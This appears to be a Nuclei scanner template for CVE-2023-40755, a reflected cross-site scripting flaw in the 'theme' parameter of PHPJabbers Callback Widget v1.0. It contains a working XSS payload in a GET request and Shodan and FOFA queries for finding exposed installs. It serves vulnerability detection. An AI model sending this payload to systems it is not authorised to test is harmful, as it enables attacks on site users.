2024-10-22 08:27:35 +00:00
|
|
|
id: CVE-2023-40755
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: PHPJabbers Callback Widget v1.0 - Cross-Site Scripting
|
|
|
|
author: ritikchaddha
|
|
|
|
severity: medium
|
|
|
|
description: |
|
|
|
|
There is a Cross Site Scripting (XSS) vulnerability in the "theme" parameter of preview.php in PHPJabbers Callback Widget v1.0.
|
|
|
|
reference:
|
|
|
|
- https://medium.com/@tfortinsec/multiple-vulnerabilities-in-phpjabbers-part-3-40fc3565982f
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-40755
|
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 6.1
|
|
|
|
cve-id: CVE-2023-40755
|
|
|
|
cwe-id: CWE-79
|
|
|
|
cpe: cpe:2.3:a:phpjabbers:callback_widget:1.0:*:*:*:*:*:*:*
|
|
|
|
metadata:
|
|
|
|
verified: true
|
|
|
|
max-request: 1
|
|
|
|
shodan-query: html:"PHPJabbers"
|
|
|
|
fofa-query: body="PHPJabbers"
|
|
|
|
vendor: phpjabbers
|
|
|
|
product: callback_widget
|
|
|
|
tags: cve,cve2023,phpjabbers,callback-widget,xss
|
|
|
|
|
|
|
|
flow: http(1) && http(2)
|
|
|
|
|
|
|
|
http:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}"
|
|
|
|
|
|
|
|
host-redirects: true
|
|
|
|
max-redirects: 2
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- 'PHPJabbers'
|
|
|
|
case-insensitive: true
|
|
|
|
internal: true
|
|
|
|
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/preview.php?theme=theme10dnel8%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Eko0so"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- 'theme=theme10dnel8"><script>alert(document.domain)</script>ko0'
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: content_type
|
|
|
|
words:
|
|
|
|
- text/html
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2024-10-22 08:53:25 +00:00
|
|
|
|
|
|
|
# digest: 4a0a00473045022100a31167f3f63b9766483e93356d902e919d61fb0592990a960a7e3eba0b7a58d802204b0b1dfa9f81532661ba26f65cd816a7984760e9cac6696964ce151d32f86023:922c64590222798bb761d5b6d8e72950
|